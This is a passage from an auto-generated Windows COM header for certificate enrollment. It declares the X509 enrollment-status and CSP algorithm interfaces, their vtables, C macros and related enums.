    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX500DistinguishedName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX500DistinguishedName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX500DistinguishedName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX500DistinguishedName_Decode(This,strEncodedName,Encoding,NameFlags)	\
    ( (This)->lpVtbl -> Decode(This,strEncodedName,Encoding,NameFlags) ) 

#define IX500DistinguishedName_Encode(This,strName,NameFlags)	\
    ( (This)->lpVtbl -> Encode(This,strName,NameFlags) ) 

#define IX500DistinguishedName_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define IX500DistinguishedName_get_EncodedName(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedName(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX500DistinguishedName_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0005 */
/* [local] */ 

typedef 
enum X509CertificateEnrollmentContext
    {
        ContextNone	= 0,
        ContextUser	= 0x1,
        ContextMachine	= 0x2,
        ContextAdministratorForceMachine	= 0x3
    } 	X509CertificateEnrollmentContext;

typedef 
enum EnrollmentEnrollStatus
    {
        Enrolled	= 0x1,
        EnrollPended	= 0x2,
        EnrollUIDeferredEnrollmentRequired	= 0x4,
        EnrollError	= 0x10,
        EnrollUnknown	= 0x20,
        EnrollSkipped	= 0x40,
        EnrollDenied	= 0x100
    } 	EnrollmentEnrollStatus;

typedef 
enum EnrollmentSelectionStatus
    {
        SelectedNo	= 0,
        SelectedYes	= 1
    } 	EnrollmentSelectionStatus;

typedef 
enum EnrollmentDisplayStatus
    {
        DisplayNo	= 0,
        DisplayYes	= 1
    } 	EnrollmentDisplayStatus;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0005_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0005_v0_0_s_ifspec;

#ifndef __IX509EnrollmentStatus_INTERFACE_DEFINED__
#define __IX509EnrollmentStatus_INTERFACE_DEFINED__

/* interface IX509EnrollmentStatus */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentStatus;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab304-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentStatus : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE AppendText( 
            /* [in] */ __RPC__in BSTR strText) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Text( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Text( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Selected( 
            /* [retval][out] */ __RPC__out EnrollmentSelectionStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Selected( 
            /* [in] */ EnrollmentSelectionStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Display( 
            /* [retval][out] */ __RPC__out EnrollmentDisplayStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Display( 
            /* [in] */ EnrollmentDisplayStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__out EnrollmentEnrollStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Status( 
            /* [in] */ EnrollmentEnrollStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Error( 
            /* [retval][out] */ __RPC__out HRESULT *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Error( 
            /* [in] */ HRESULT Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ErrorText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentStatusVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentStatus * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentStatus * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentStatus * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *AppendText )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in BSTR strText);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Text )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Text )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Selected )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentSelectionStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Selected )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentSelectionStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Display )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentDisplayStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Display )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentDisplayStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentEnrollStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Status )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentEnrollStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Error )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out HRESULT *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Error )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ HRESULT Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ErrorText )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509EnrollmentStatusVtbl;

    interface IX509EnrollmentStatus
    {
        CONST_VTBL struct IX509EnrollmentStatusVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentStatus_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentStatus_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentStatus_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentStatus_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentStatus_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentStatus_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentStatus_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentStatus_AppendText(This,strText)	\
    ( (This)->lpVtbl -> AppendText(This,strText) ) 

#define IX509EnrollmentStatus_get_Text(This,pValue)	\
    ( (This)->lpVtbl -> get_Text(This,pValue) ) 

#define IX509EnrollmentStatus_put_Text(This,Value)	\
    ( (This)->lpVtbl -> put_Text(This,Value) ) 

#define IX509EnrollmentStatus_get_Selected(This,pValue)	\
    ( (This)->lpVtbl -> get_Selected(This,pValue) ) 

#define IX509EnrollmentStatus_put_Selected(This,Value)	\
    ( (This)->lpVtbl -> put_Selected(This,Value) ) 

#define IX509EnrollmentStatus_get_Display(This,pValue)	\
    ( (This)->lpVtbl -> get_Display(This,pValue) ) 

#define IX509EnrollmentStatus_put_Display(This,Value)	\
    ( (This)->lpVtbl -> put_Display(This,Value) ) 

#define IX509EnrollmentStatus_get_Status(This,pValue)	\
    ( (This)->lpVtbl -> get_Status(This,pValue) ) 

#define IX509EnrollmentStatus_put_Status(This,Value)	\
    ( (This)->lpVtbl -> put_Status(This,Value) ) 

#define IX509EnrollmentStatus_get_Error(This,pValue)	\
    ( (This)->lpVtbl -> get_Error(This,pValue) ) 

#define IX509EnrollmentStatus_put_Error(This,Value)	\
    ( (This)->lpVtbl -> put_Error(This,Value) ) 

#define IX509EnrollmentStatus_get_ErrorText(This,pValue)	\
    ( (This)->lpVtbl -> get_ErrorText(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentStatus_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0006 */
/* [local] */ 

typedef 
enum X509ProviderType
    {
        XCN_PROV_NONE	= 0,
        XCN_PROV_RSA_FULL	= 1,
        XCN_PROV_RSA_SIG	= 2,
        XCN_PROV_DSS	= 3,
        XCN_PROV_FORTEZZA	= 4,
        XCN_PROV_MS_EXCHANGE	= 5,
        XCN_PROV_SSL	= 6,
        XCN_PROV_RSA_SCHANNEL	= 12,
        XCN_PROV_DSS_DH	= 13,
        XCN_PROV_EC_ECDSA_SIG	= 14,
        XCN_PROV_EC_ECNRA_SIG	= 15,
        XCN_PROV_EC_ECDSA_FULL	= 16,
        XCN_PROV_EC_ECNRA_FULL	= 17,
        XCN_PROV_DH_SCHANNEL	= 18,
        XCN_PROV_SPYRUS_LYNKS	= 20,
        XCN_PROV_RNG	= 21,
        XCN_PROV_INTEL_SEC	= 22,
        XCN_PROV_REPLACE_OWF	= 23,
        XCN_PROV_RSA_AES	= 24
    } 	X509ProviderType;

// XCN_BCRYPT_SIGNATURE_INTERFACE: RSA, DSA, ECDSA_P* signature
// XCN_BCRYPT_ASYMMETRIC_ENCRYPTION_INTERFACE: RSA encryption
// XCN_BCRYPT_CIPHER_INTERFACE: RC2, RC4, DES, 3DES, AES symmetric encryption
// XCN_BCRYPT_HASH_INTERFACE: MD2, MD4, SHA1, SHA256, SHA384, SHA512 MAC, HMAC Hash
// XCN_BCRYPT_SECRET_AGREEMENT_INTERFACE: DH, ECDH_P* key agreement
// XCN_BCRYPT_RNG_INTERFACE: RNG
typedef 
enum AlgorithmType
    {
        XCN_BCRYPT_UNKNOWN_INTERFACE	= 0,
        XCN_BCRYPT_SIGNATURE_INTERFACE	= 0x5,
        XCN_BCRYPT_ASYMMETRIC_ENCRYPTION_INTERFACE	= 0x3,
        XCN_BCRYPT_CIPHER_INTERFACE	= 0x1,
        XCN_BCRYPT_HASH_INTERFACE	= 0x2,
        XCN_BCRYPT_SECRET_AGREEMENT_INTERFACE	= 0x4,
        XCN_BCRYPT_RNG_INTERFACE	= 0x6
    } 	AlgorithmType;

typedef 
enum AlgorithmOperationFlags
    {
        XCN_NCRYPT_NO_OPERATION	= 0,
        XCN_NCRYPT_CIPHER_OPERATION	= 0x1,
        XCN_NCRYPT_HASH_OPERATION	= 0x2,
        XCN_NCRYPT_ASYMMETRIC_ENCRYPTION_OPERATION	= 0x4,
        XCN_NCRYPT_SECRET_AGREEMENT_OPERATION	= 0x8,
        XCN_NCRYPT_SIGNATURE_OPERATION	= 0x10,
        XCN_NCRYPT_RNG_OPERATION	= 0x20,
        XCN_NCRYPT_ANY_ASYMMETRIC_OPERATION	= ( ( 0x4 | 0x8 )  | 0x10 ) ,
        XCN_NCRYPT_PREFER_SIGNATURE_ONLY_OPERATION	= 0x200000,
        XCN_NCRYPT_PREFER_NON_SIGNATURE_OPERATION	= 0x400000,
        XCN_NCRYPT_EXACT_MATCH_OPERATION	= 0x800000,
        XCN_NCRYPT_PREFERENCE_MASK_OPERATION	= 0xe00000
    } 	AlgorithmOperationFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0006_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0006_v0_0_s_ifspec;

#ifndef __ICspAlgorithm_INTERFACE_DEFINED__
#define __ICspAlgorithm_INTERFACE_DEFINED__

/* interface ICspAlgorithm */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspAlgorithm;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab305-217d-11da-b2a4-000e7bbb2b09")
    ICspAlgorithm : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetAlgorithmOid( 
            /* [in] */ LONG Length,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_DefaultLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_IncrementLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_LongName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Valid( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MaxLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MinLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out AlgorithmType *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Operations( 
            /* [retval][out] */ __RPC__out AlgorithmOperationFlags *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspAlgorithmVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspAlgorithm * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspAlgorithm * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspAlgorithm * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspAlgorithm * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetAlgorithmOid )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ LONG Length,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_IncrementLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_LongName )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Valid )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MaxLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MinLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out AlgorithmType *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Operations )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out AlgorithmOperationFlags *pValue);
        
        END_INTERFACE
    } ICspAlgorithmVtbl;

    interface ICspAlgorithm
    {
        CONST_VTBL struct ICspAlgorithmVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspAlgorithm_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspAlgorithm_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspAlgorithm_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspAlgorithm_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspAlgorithm_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspAlgorithm_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspAlgorithm_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspAlgorithm_GetAlgorithmOid(This,Length,AlgFlags,ppValue)	\
    ( (This)->lpVtbl -> GetAlgorithmOid(This,Length,AlgFlags,ppValue) ) 

#define ICspAlgorithm_get_DefaultLength(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultLength(This,pValue) ) 

#define ICspAlgorithm_get_IncrementLength(This,pValue)	\
    ( (This)->lpVtbl -> get_IncrementLength(This,pValue) ) 

#define ICspAlgorithm_get_LongName(This,pValue)	\
    ( (This)->lpVtbl -> get_LongName(This,pValue) ) 

#define ICspAlgorithm_get_Valid(This,pValue)	\
    ( (This)->lpVtbl -> get_Valid(This,pValue) ) 

#define ICspAlgorithm_get_MaxLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MaxLength(This,pValue) ) 

#define ICspAlgorithm_get_MinLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MinLength(This,pValue) ) 

#define ICspAlgorithm_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define ICspAlgorithm_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define ICspAlgorithm_get_Operations(This,pValue)	\
    ( (This)->lpVtbl -> get_Operations(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspAlgorithm_INTERFACE_DEFINED__ */


#ifndef __ICspAlgorithms_INTERFACE_DEFINED__
#define __ICspAlgorithms_INTERFACE_DEFINED__

/* interface ICspAlgorithms */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspAlgorithms;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab306-217d-11da-b2a4-000e7bbb2b09")
    ICspAlgorithms : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspAlgorithm *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspAlgorithmsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspAlgorithms * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspAlgorithms * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspAlgorithms * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspAlgorithms * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspAlgorithms * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspAlgorithms * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspAlgorithms * This);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        END_INTERFACE
    } ICspAlgorithmsVtbl;

    interface ICspAlgorithms
    {
        CONST_VTBL struct ICspAlgorithmsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspAlgorithms_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspAlgorithms_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspAlgorithms_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspAlgorithms_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

